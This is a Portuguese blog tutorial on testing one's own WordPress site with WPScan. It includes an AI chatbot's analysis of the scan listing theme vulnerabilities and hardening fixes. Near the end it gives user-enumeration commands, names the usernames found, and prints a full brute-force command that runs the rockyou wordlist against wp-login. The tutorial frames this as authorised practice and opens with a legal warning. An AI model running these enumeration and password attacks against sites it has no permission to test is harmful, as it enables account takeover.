Antes de qualquer coisa eu preciso informar que você pode usar este conteúdo para estudar e se aprofundar em Segurança da Informação em especial pentest, mas atenção: É crime fazer teste de penetração ou pesquisar vulnerabilidades em sites ou aplicativos que você não tenha autorização.
Você pode ler mais sobre as leis: 12.737/2012 que diz no artigo 154-A:
Art. 154-A: Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo…
- Pena: Detenção de 1 a 4 anos e multa. Se a invasão resultar na obtenção de conteúdo de comunicações eletrônicas privadas, segredos comerciais ou industriais, a pena pode aumentar significativamente.
Como praticar de forma legal?
Você pode testar em um site de sua propriedade ou instalar o WordPress, que é o CMS que iremos praticar neste pentest em um ambiente de virtualização de sua propriedade.
Kali linux – Mas não precisa instalar
Para realizar os meus testes que usei como base para um vídeo em meu canal do youtube sobre o assunto, se preferir assistir do que ler, segue o vídeo:
usei o Kali Linux em um contêiner distrobox, isto é simples e prático, por que só instalamos o que realmente necessitamos. No caso do Debian ou derivados, como Ubuntu, Linux mint entre outros, basta um:
sudo apt install distroboxEm caso de Red hat ou derivados:
dnf install distroboxCom o distrobox instalado, eu recomendo que você instale um aplicativo gráfico para gerenciar seus contêiners. Eu recomendo o pacote em Flatpak chamado Konteiner.
Se você não sabe como instalar o Flatpak/Flathub em sua distribuição de linux, acesse o site de instrução do flathub:
Configurar o Flathub | Flathub
Com o Flatpak instalado faça:
flatpak install flathub io.github.DenysMb.Kontainer
Com ele instalado, como mostra a imagem acima, clique em criar , em nome coloque : Kali, e na imagem busque por kali, conforme mostro na imagem abaixo:
Agora espere alguns minutos e abra o terminal do contêiner Kali.
Instale o wpscan e o wordlist:
sudo apt install wpscan wordlistAcesse o site : WPScan: WordPress Security Scanner
Crie uma conta e copie o token. Ele será necessário para nossos testes.
Execute:
wpscan --url https://profjulianoramos.com \
--api-token SEU_TOKEN \
--enumerate ap,at,u \
--plugins-detection aggressiveEu recomendo que você cole o resultado em uma IA como o Gemini ou claude, assim terá uma resposta mais detalhada de tudo.
No meu caso o resultado foi:
📊 Análise do WPScan — profjulianoramos.com
✅ Boas Notícias
- WordPress 6.9.4 — está na versão mais recente, ótimo!
- PHP 8.3.30 — versão moderna e suportada.
🚨 Vulnerabilidades Críticas — TEMA: News Magazine X
Seu tema tem 2 vulnerabilidades confirmadas e precisa ser atualizado agora:
1. CVE-2025-24766 — Local File Inclusion (LFI) — CRÍTICA
- Qualquer visitante sem login pode incluir arquivos locais do servidor
- Risco: leitura de
wp-config.php, arquivos de senha, etc. - Corrigida na versão
1.2.38— a sua está desatualizada
2. CVE-2026-24382 — Missing Authorization — ALTA
- Funções administrativas sem verificação de permissão
- Risco: usuário sem privilégios pode executar ações restritas
- Corrigida na versão
1.2.51
A versão atual do tema é 1.2.53, então basta atualizar pelo painel do WordPress agora.
⚠️ Informações Expostas (Information Disclosure)
AchadoRiscoAçãox-powered-by: PHP/8.3.30Revela versão do PHPOcultar via .htaccessplatform: hostinger / panel: hpanelRevela infraestruturaDifícil ocultar, baixo riscorobots.txt expõe /wp-admin/Indica caminho de loginNormal, mas vale monitorarVersão do WP no RSS/metaFacilita ataques direcionadosRemover com plugin ou código
🔧 Scan abortado — Falsos Positivos nos Plugins
O scan parou porque detectou mais de 100 “plugins” — provavelmente falsos positivos. Rode novamente com o flag correto:
bash
wpscan --url https://profjulianoramos.com \
--api-token $WPSCAN_TOKEN \
--enumerate ap,at,u \
--plugins-detection aggressive \
--exclude-content-based🛠️ Ações Imediatas (por prioridade)
🔴 Agora:
WordPress Admin → Aparência → Temas → News Magazine X → Atualizar🟡 Esta semana — ocultar versão do WP (no functions.php do tema filho):
php
// Remover versão do WordPress do RSS e meta
remove_action('wp_head', 'wp_generator');
add_filter('the_generator', '__return_empty_string');🟡 Ocultar header PHP no .htaccess:
apache
Header unset X-Powered-By
Header always unset X-Powered-By🟢 Depois — Content Security Policy mais robusta:
Seu CSP atual só tem upgrade-insecure-requests, que é bem fraco. Um CSP completo bloqueia XSS, clickjacking e injeção de recursos.
Quer que eu rode os próximos passos com você? Sugiro:
- Rodar o scan novamente com
--exclude-content-basedpara ver os plugins - Verificar o Sucuri SiteCheck para cruzar com análise de malware
- Testar manualmente o LFI do CVE-2025-24766 (para ver se já está patchado)
Este resultado acima, obtive colando a saída no Claude.ai, mas acredito que terá bons resultados em outros chats de inteligência artificial.
Fazendo um brute force
Para testar usuários e senhas, vamos primeiro descobrir os usuários:
wpscan --url https://profjulianoramos.com \
--api-token $WPSCAN_TOKEN \
--enumerate uNo meu resultado descobri os usuários: giovana e profjulinoramosgmail-com com esta informação. Descompacte a lista wordlist:
cd /usr/share/wordlists/
gunzip rockyou.txt.gzExecute:
wpscan --url https://profjulianoramos.com \
--usernames giovanna,profjulinoramosgmail-com \
--passwords /usr/share/wordlists/rockyou.txt \
--password-attack wp-login \
--max-threads 5Agora é só aguardar se ele conseguir “quebrar sua senha” vai mostrar na saída do terminal.
Crie sempre boas senhas, informe seus usuários sobre uma política de boas práticas de segurança da informação e mantenha seus sistemas atualizados. Comente este artigo, coloque como foi sua experiência. Se quiser falar diretamente comigo, estou todos os dias na rede social da Certbest : https://certbestlabs.com
